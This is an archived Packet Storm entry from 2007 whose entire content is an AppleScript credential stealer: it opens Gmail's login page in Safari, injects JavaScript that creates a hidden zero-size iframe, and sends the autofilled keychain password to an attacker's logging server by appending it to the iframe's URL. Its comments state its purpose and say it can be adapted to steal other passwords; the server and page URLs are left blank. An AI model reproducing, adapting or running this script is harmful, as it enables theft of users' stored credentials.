Type packetstorm
Reporter poplix
Modified 2007-09-30T00:00:00


                                            `-- This script can be used to steal gmail's keychained password by injecting   
-- Javascripts into Safari. When executed it opens gmail's login page, reads  
-- saved password and sends it to a logging server by creating an hidden iframe  
-- into gmail's page. It can be easly modified to steal other pass.   
-- poplix -- -- 09-22-2007  
--Your logging server  
set LOGGING_URL to ""  
--Creates an hidden iframe into google's login DIV  
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'"   
--Stealing code  
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"  
--Open gmail login page   
tell application "Safari"  
open location ""  
end tell  
--Wait loading...  
delay 10  
--Create an hidden iframe to load LOGGING_URL  
tell application "Safari"  
do JavaScript HIDDENFRAME in document 1  
end tell  
delay 1  
--Send password to LOGGING_URL  
tell application "Safari"  
do JavaScript JSTEAL in document 1  
end tell